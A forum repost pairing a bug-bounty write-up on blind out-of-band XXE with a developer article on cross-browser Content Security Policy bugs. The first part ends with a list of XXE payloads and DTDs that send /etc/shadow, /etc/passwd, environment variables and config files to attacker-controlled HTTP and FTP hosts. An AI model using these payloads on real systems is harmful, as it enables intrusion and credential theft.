Posted on March 24, 2018 by tghawkins Today, I’d like to share my methodology behind how I found a blind, out of band xml external entities attack in a private bug bounty program. I have redacted the necessary information to hide the program’s identity. As with the beginning of any hunter’s quest, thorough recon is necessary to identify as many in-scope assets as possible. Through this recon, I was able discover a subdomain that caught my interest. I then brute forced the directories of the subdomain, and found the endpoint /notifications. Visiting this endpoint via a GET request resulted in the following page: I noticed in the response, the xml content-type along with an xml body containing XML SOAP syntax. Since I had no GET parameters to test, I decided to issue a POST request to the endpoint, finding that the body of the response had disappeared, with a response code of 200. Since the web application seemed to be responding well to the POST request, instead of the issuing a 405 Method Not Allowed error, I decided to issue a request containing xml syntax with the content-type: application/xml. The resulting response was also different than in the previous cases. This response was also in XML as it was when issuing the GET request to this endpoint. However this time, within the tags is the value “OK” instead of the original value “TestRequestCalled”. I also tried to send a json request to see how the application would respond. Below is the result. Seeing as how the response was blank, as it was when issuing a POST request with no specified content type, I had a strong belief that the endpoint was processing XML data. This was enough for me to an set up my VPS to host a DTD file for the XML processor to “hopefully” parse. Below is the result of the dtd being successfully processed, with the requested file contents appended. I also used this script: https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb to set up, and have an ftp server listening so I would also be able to extract the server’s information/file contents through the ftp protocol: https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb Although this submission was marked as a duplicate, I wanted to share this finding as it was a good learning experience, and I was able to examine how the application was responding to certain inputs without knowing its exact purpose/functionality. The original reporter had not been able to extract information from the server, and received $8k for this issue. Some helpful XXE payloads: -------------------------------------------------------------- Vanilla, used to verify outbound xxe or blind xxe -------------------------------------------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> ]> <r>&sp;</r> --------------------------------------------------------------- OoB extraction --------------------------------------------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> %sp; %param1; ]> <r>&exfil;</r> ## External dtd: ## <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> ---------------------------------------------------------------- OoB variation of above (seems to work better against .NET) ---------------------------------------------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> %sp; %param1; %exfil; ]> ## External dtd: ## <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> --------------------------------------------------------------- OoB extraction --------------------------------------------------------------- <?xml version="1.0"?> <!DOCTYPE r [ <!ENTITY % data3 SYSTEM "file:///etc/shadow"> <!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd"> %sp; %param3; %exfil; ]> ## External dtd: ## <!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp://Evilhost:port/%data3;'>"> ----------------------------------------------------------------------- OoB extra ERROR -- Java ----------------------------------------------------------------------- <?xml version="1.0"?> <!DOCTYPE r [ <!ENTITY % data3 SYSTEM "file:///etc/passwd"> <!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd"> %sp; %param3; %exfil; ]> <r></r> ## External dtd: ## <!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'> %param1; %external; ----------------------------------------------------------------------- OoB extra nice ----------------------------------------------------------------------- <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY % start "<![CDATA["> <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml "> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://evil/evil.xml"> %dtd; ]> <root>&all;</root> ## External dtd: ## <!ENTITY all "%start;%stuff;%end;"> ------------------------------------------------------------------ File-not-found exception based extraction ------------------------------------------------------------------ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" > %one; %two; %four; ]> ## External dtd: ## <!ENTITY % three SYSTEM "file:///etc/passwd"> <!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>"> -------------------------^ you might need to encode this % (depends on your target) as: % -------------- FTP -------------- <?xml version="1.0" ?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd"> %asd; %c; ]> <a>&rrr;</a> ## External dtd ## <!ENTITY % d SYSTEM "file:///proc/self/environ"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>"> --------------------------- Inside SOAP body --------------------------- <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> --------------------------- Untested - WAF Bypass --------------------------- <!DOCTYPE :. SYTEM "http://" <!DOCTYPE :_-_: SYTEM "http://" <!DOCTYPE {0xdfbf} SYSTEM "http://" view rawXXE_payloads hosted with by GitHub Sursa: https://hawkinsecurity.com/2018/03/24/gaining-filesystem-access-via-blind-oob-xxe/
-
Stefan Matsson 2018-03-26 # Security CSP IMPLEMENTATIONS ARE BROKEN TL;DR frame-src is inconsistent cross browser block-all-mixed-content is broken in Chrome and Opera CSP reports are inconsitent Edge has some weird edge cases (no pun intended) INTRO There has been a lot of talk lately about Content Security Policy (CSP) after an accessibility script called BrowseAloud got infected by a cryptominer and force the users of a couple of thousand websites to mine cryptocurrency without their knowledge. Content Security Policy could have prevented this issue as it contains rules for what the browser can load and what not to load. Read more at https://content-security-policy.com I recently held a talk with the title “Content Security Policy - Or how we ruined our site, learned a lesson, broke the site again and then fixed it”. This talk was based on my work at my current client. This post is sort of a summary of that talk and will outline some of the issues we found in different browsers and with different combinations of devices, OSs, browsers, extensions and whatnot. SOME INFO ON THE SYSTEM WE ARE BUILDING My client provides payment services for e-commerce. The system will be loaded as an iframe on the e-commerce site and allows the customer to finish their purchase. We use features in CSP that require us to use CSP2 (e.g. script hashes). Our system in turn loads an iframe from a trusted service provider (let’s call it SystemX). SystemX will in some cases redirect to one of their trusted providers. SystemX has literaly hundreds of trusted providers all over the world and each of these have their own page that must be loaded in the iframe. I will not go into more details on why to not reveal to much information about my client. FRAME-SRC IS INCONSISTENT CROSS BROWSER If your CSP contains a frame-src that does not contain mailto: or tel: these links will be blocked inside the iframe except in Firefox and Edge. Firefox will open both links and Edge will open the mailto link but block the tel link. I’m not really sure if it’s broken in Firefox or in the other browsers. There are valid arguments for both cases. Workaround: Add mailto: and tel: to your CSP: frame-src 'self' mailto: tel: I have reported this to Microsoft but have not heard back. Affected browsers: Firefox and Edge or all others depending on your point of view Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-links-frame-src/ EDGE AND CUSTOM ERROR PAGES We load an iframe from a trusted service provider which in turn redirects to different sites depending on circumstances. As we cannot know what URLs will be redirected to we currenty use this frame-src in our CSP: frame-src 'self' data: https: The issue with Edge is that it will load custom error pages for issues such as DNS errors, SmartScreen blocking and error responses from the server (e.g. 400, 404, 500 etc). The error page is loaded via a ms-appx-web:// url (e.g ms-appx-web:///assets/errorpages/http_500.htm) which is blocked by the CSP and a blank page is displayed to the user. The result is that our service provider’s iframe is just blank if an error occurrs. I have reported this issue to Microsoft in early March but have not heard anything back from them. Workaround: Add ms-appx-web: to our frame-src: frame-src 'self' data: https: ms-appx-web: Affected browsers: Edge Proof of concept: https:/jellyhive.github.io/CspImplementationsAreBroken/edge-ms-appx-web-frame-src/ EDGE AND EXTENSIONS Extensions installed in Edge are subject to the current page’s content security policy. Basically all installed extensions that try to do anything from loading images to JS will fail and a CSP violation will be logged. According to the CSP spec this is wrong. The issue has been fixed but not yet released according to the Edge issue tracker (issue 1132012). Affected browsers: Edge BLOCK-ALL-MIXED-CONTENT BLOCKS TEL AND MAILTO LINKS IN IFRAMES BUT NOT IN THE PARENT PAGE If you serve your site using HTTPS and use the block-all-mixed-content directive in your CSP, mailto and tel links will be blocked inside iframes but not on your main page. This does not happen if you serve the site using HTTP. If the user tries to click a mailto or tel link on your page (i.e. the parent page) it will work as intended. Clicking the same links in an iframe will log one of these two errors: Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'mailto:...'. This request has been blocked; the content must be served over HTTPS. Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'tel:...'. This request has been blocked; the content must be served over HTTPS. This issue has been reported to Google and Opera. Opera has not yet responded. Workaround: Remove block-all-mixed-content from your CSP (possibly use upgrade-insecure-requests instead) Affected browsers: Chrome and Opera Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-link-block-all-mixed-content/ SAFARI ON OLDER IOS DEVICES DOES NOT SUPPORT CSP2 “Older” in this case meaning iOS 9 or earlier. Safari on iOS 10 and 11 do support CSP2. Since we require the use of script hashes we also require CSP2. Desktop Safari is also affected is not as big of a problem as most desktops are up to date. Current usage on our site is less than 0.9% for older Safari on desktop. Workaround: There is no way to make this work so we have disabled CSP for older iOS devices using user agent sniffing. Affected browsers: Safari on iOS < 10 (both iPhone and iPad) and Safari 9 or earlier on desktop INTERNET EXPLORER 11 ONLY SUPPORTS X-CONTENT-SECURITY-POLICY AND CSP1 IE11 supports CSP1 using the X-Content-Security-Policy. If you wish to support IE11 you need to either do some user agent sniffing and change the header from Content-Security-Policy to X-Content-Security-Policy or send out both headers for everyone. In our case we barely have any customers on IE11 so we just send out the regular Content-Security-Policy header which is then ignored by IE11. Affected browsers: Internet Explorer 11 (older versions does not support CSP) CSP REPORTS DIFFER BETWEEN BROWSERS The reports sent to your report-uri should follow a common standard defined in the CSP spec but browsers differ on what data they send. Some versions of Safari includes the entire CSP in the violated-directive property. This is like saying “Something went wrong. You find out what and deal with it.” Chrome on Android does sometimes not provide a blocked-uri when the violated-directive is frame-src. This means that we have no way of knowing what URL was blocked in the iframe. Most browsers does not provide a script-sample when an inline script is blocked. script-sample is very helpful in debugging what script was blocked. CSP REPORTS CONTAIN LOTS OF FALSE POSITIVES This is primarily due to browser extensions. Most extension work by injecting code on the page and code on the page is subject to the page’s CSP. A common issue we have found in our logs is violated-directive: script-src blocked-uri: about:blank which is casued by adblockers when they replace the loading of tracking scripts (e.g. Google Analytics) with the loading of about:blank. SUMMARY Content Security Policy is a great tool that should be deployed in more places. It does however take some fine tuning to make it work properly on a specific site. Sursa: https://jellyhive.com/activity/posts/2018/03/26/csp-implementations-are-broken/